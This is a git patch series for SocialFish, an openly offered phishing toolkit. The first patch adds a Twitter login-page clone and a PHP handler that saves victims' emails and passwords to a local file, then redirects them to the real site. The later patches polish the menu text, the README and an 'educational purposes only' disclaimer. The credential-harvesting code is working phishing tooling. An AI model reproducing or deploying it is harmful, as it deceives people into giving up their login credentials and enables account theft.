From 395113b253d8d38600d3aca31636f11794b2111e Mon Sep 17 00:00:00 2001 From: cloaksec Date: Tue, 6 Feb 2018 02:26:08 -0800 Subject: [PATCH 1/3] Add twitter --- SocialFish.py | 8 +- WebPages/twitter/index.html | 1297 +++++++++++++++++++++++++++++++++ WebPages/twitter/login.php | 14 + WebPages/twitter/protect.html | 1 + 4 files changed, 1319 insertions(+), 1 deletion(-) create mode 100644 WebPages/twitter/index.html create mode 100644 WebPages/twitter/login.php create mode 100644 WebPages/twitter/protect.html diff --git a/SocialFish.py b/SocialFish.py index aeb27e6..f158e23 100644 --- a/SocialFish.py +++ b/SocialFish.py @@ -91,6 +91,8 @@ def runPhishing(social, option2): system('cp WebPages/stackoverflow/*.* Server/www/') elif social == 'WordPress': system('cp WebPages/wordpress/*.* Server/www/') + elif social == 'Twitter': + system('cp WebPages/twitter/*.* Server/www/') def waitCreds(): print " {0}[{1}*{0}]{1} Waiting for credentials... \n".format(GREEN, END) @@ -139,7 +141,7 @@ def runPEnv(): system('clear') print '\n[ {0}YOU ARE NOT AUTHORIZED TO USE THIS TOOL{1} ]\n'.format(RED, END) exit(0) - option = raw_input("\nSelect an option:\n\n {0}[{1}1{0}]{1} Facebook\n\n {0}[{1}2{0}]{1} Google\n\n {0}[{1}3{0}]{1} LinkedIN\n\n {0}[{1}4{0}]{1} Github\n\n {0}[{1}5{0}]{1} StackOverflow\n\n {0}[{1}6{0}]{1} WordPress\n\n {0}SF > {1}".format(CYAN, END)) + option = raw_input("\nSelect an option:\n\n {0}[{1}1{0}]{1} Facebook\n\n {0}[{1}2{0}]{1} Google\n\n {0}[{1}3{0}]{1} LinkedIN\n\n {0}[{1}4{0}]{1} Github\n\n {0}[{1}5{0}]{1} StackOverflow\n\n {0}[{1}6{0}]{1} WordPress\n\n {0}[{1}7{0}]{1} Twitter\n\n {0}SF > {1}".format(CYAN, END)) if option == '1': loadModule('Facebook') option2 = raw_input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)\n\n {0}SF > {1}".format(CYAN, END)) @@ -164,6 +166,10 @@ def runPEnv(): loadModule('WordPress') option2 = '' runPhishing('WordPress', option2) + elif option == '7': + loadModule('Twitter') + option2 = '' + runPhishing('Twitter', option2) else: exit(0) diff --git a/WebPages/twitter/index.html b/WebPages/twitter/index.html new file mode 100644 index 0000000..d3f441c --- /dev/null +++ b/WebPages/twitter/index.html @@ -0,0 +1,1297 @@ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Login on Twitter + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + Skip to content + + + + + + + + + + +
+
+ + + +
+
+
+ + + +
+ + + + +
+ +
+
+
+
+ + +
+ +
+
+ + + + + +
+
+ +
+
+ + +
+
+ + + + Previous + + + +
+
+ + + + Next + + + +
+
+
+
+ + + +
+ +
+ + + + + + + + + + + + + + +
+
+
+ + +
+
    +
  • +

    Tweet with a location

    +

    + You can add location information to your Tweets, such as your city or precise location, from the web and via third-party applications. You always have the option to delete your Tweet location history. + Learn more +

    +
    + + +
    +
    • +
+
+ +
+ +
+
+
+ + +
+
+
+ + +
+
+
    +
    +
    + +
    + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
    +
    + +
    + +
    +
    + +
    +
    +
    +
    +
    +
    +
    + + + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/WebPages/twitter/login.php b/WebPages/twitter/login.php new file mode 100644 index 0000000..a8314b4 --- /dev/null +++ b/WebPages/twitter/login.php @@ -0,0 +1,14 @@ +There's a Phishing Page generated by SocialFish in this website."; +if($myFile == $searchString) { + file_put_contents("cat.txt", "[EMAIL]: " . $var . " [PASS]: " . $var2 . "\n", FILE_APPEND); + header('Location: https://twitter.com/'); +} +if($myFile != $searchString) { + echo "***ALERT! I AM A FAKE PAGE | DO NOT TRUST ME"; +} +exit(); +?> diff --git a/WebPages/twitter/protect.html b/WebPages/twitter/protect.html new file mode 100644 index 0000000..0d6e87d --- /dev/null +++ b/WebPages/twitter/protect.html @@ -0,0 +1 @@ +There's a Phishing Page generated by SocialFish in this website. \ No newline at end of file From 69fa5f09976253a38479b8f8ddcc03dceaa22164 Mon Sep 17 00:00:00 2001 From: cloaksec Date: Tue, 6 Feb 2018 02:37:38 -0800 Subject: [PATCH 2/3] Small ux / language updates --- README.md | 8 ++++---- SocialFish.py | 12 ++++++------ WebPages/fb_advanced_poll/index.html | 2 +- WebPages/google_advanced_poll/index.html | 2 +- 4 files changed, 12 insertions(+), 12 deletions(-) diff --git a/README.md b/README.md index b407942..657744e 100644 --- a/README.md +++ b/README.md @@ -54,8 +54,8 @@ python SocialFish.py - Traditional Google login page. - Advanced login with Facebook. -**+ LinkedIN:** -- Traditional LinkedIN login page. +**+ LinkedIn:** +- Traditional LinkedIn login page. **+ Github:** - Traditional Github login page. @@ -73,10 +73,10 @@ python SocialFish.py ## DISCLAIMER

    - JUST USE TO EDUCATIONAL PURPOSES + TO BE USED FOR EDUCATIONAL PURPOSES ONLY

    -The use of the SocialFish is COMPLETE RESPONSIBILITY of the END-USER. Developer assume NO liability and are NOT responsible for any misuse or damage caused by this program. +The use of the SocialFish is COMPLETE RESPONSIBILITY of the END-USER. Developers assume NO liability and are NOT responsible for any misuse or damage caused by this program. "DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL diff --git a/SocialFish.py b/SocialFish.py index f158e23..0003752 100644 --- a/SocialFish.py +++ b/SocialFish.py @@ -71,7 +71,7 @@ def loadModule(module): `=.____.=" `._\\ - [{1}*{0}]{1} %s module loaded.{0}'''.format(CYAN, END) % module + [{1}*{0}]{1} %s module loaded. Building site...{0}'''.format(CYAN, END) % module def runPhishing(social, option2): system('sudo rm -Rf Server/www/*.* && touch Server/www/cat.txt') @@ -83,7 +83,7 @@ def runPhishing(social, option2): system('cp WebPages/google_standard/*.* Server/www/') elif option2 == '2' and social == 'Google': system('cp WebPages/google_advanced_poll/*.* Server/www/') - elif social == 'LinkedIN': + elif social == 'LinkedIn': system('cp WebPages/linkedin/*.* Server/www/') elif social == 'Github': system('cp WebPages/github/*.* Server/www/') @@ -137,11 +137,11 @@ def runPEnv(): else: print " --{0}>{1} PHP NOT FOUND: \n {0}*{1} Please install PHP and run me again. http://www.php.net/".format(RED, END) exit(0) - if raw_input(" {0}[{1}!{0}]{1} Do you will use this tool only for educational purposes? (y/n)\n {2}SF > {1}".format(RED, END, CYAN)).upper() == 'N': + if raw_input(" {0}[{1}!{0}]{1} Do you agree to use this tool for educational purposes only? (y/n)\n {2}SF > {1}".format(RED, END, CYAN)).upper() == 'N': system('clear') print '\n[ {0}YOU ARE NOT AUTHORIZED TO USE THIS TOOL{1} ]\n'.format(RED, END) exit(0) - option = raw_input("\nSelect an option:\n\n {0}[{1}1{0}]{1} Facebook\n\n {0}[{1}2{0}]{1} Google\n\n {0}[{1}3{0}]{1} LinkedIN\n\n {0}[{1}4{0}]{1} Github\n\n {0}[{1}5{0}]{1} StackOverflow\n\n {0}[{1}6{0}]{1} WordPress\n\n {0}[{1}7{0}]{1} Twitter\n\n {0}SF > {1}".format(CYAN, END)) + option = raw_input("\nSelect an option:\n\n {0}[{1}1{0}]{1} Facebook\n\n {0}[{1}2{0}]{1} Google\n\n {0}[{1}3{0}]{1} LinkedIn\n\n {0}[{1}4{0}]{1} Github\n\n {0}[{1}5{0}]{1} StackOverflow\n\n {0}[{1}6{0}]{1} WordPress\n\n {0}[{1}7{0}]{1} Twitter\n\n {0}SF > {1}".format(CYAN, END)) if option == '1': loadModule('Facebook') option2 = raw_input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)\n\n {0}SF > {1}".format(CYAN, END)) @@ -151,9 +151,9 @@ def runPEnv(): option2 = raw_input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)\n\n {0}SF > {1}".format(CYAN, END)) runPhishing('Google', option2) elif option == '3': - loadModule('LinkedIN') + loadModule('LinkedIn') option2 = '' - runPhishing('LinkedIN', option2) + runPhishing('LinkedIn', option2) elif option == '4': loadModule('Github') option2 = '' diff --git a/WebPages/fb_advanced_poll/index.html b/WebPages/fb_advanced_poll/index.html index 74e5e48..794e574 100644 --- a/WebPages/fb_advanced_poll/index.html +++ b/WebPages/fb_advanced_poll/index.html @@ -22,7 +22,7 @@

    #289032

    Select your favorite social networks:
    Facebook
    Twitter
    - LinkedIN
    + LinkedIn
    Instagram
    Snapchat
    Google+

    diff --git a/WebPages/google_advanced_poll/index.html b/WebPages/google_advanced_poll/index.html index 74e5e48..794e574 100644 --- a/WebPages/google_advanced_poll/index.html +++ b/WebPages/google_advanced_poll/index.html @@ -22,7 +22,7 @@

    #289032

    Select your favorite social networks:
    Facebook
    Twitter
    - LinkedIN
    + LinkedIn
    Instagram
    Snapchat
    Google+

    From 51131a94508520cb1d10e1ca83b8e6d9eaa6d1fd Mon Sep 17 00:00:00 2001 From: cloaksec Date: Tue, 6 Feb 2018 02:38:58 -0800 Subject: [PATCH 3/3] Update readme --- README.md | 3 +++ 1 file changed, 3 insertions(+) diff --git a/README.md b/README.md index 657744e..538e026 100644 --- a/README.md +++ b/README.md @@ -66,6 +66,9 @@ python SocialFish.py **+ Wordpress:** - Similar Wordpress login page. +**+ Twitter:** +- Traditional Twitter login page. + **PULL REQUESTS ARE WELCOME** ### SCREENSHOT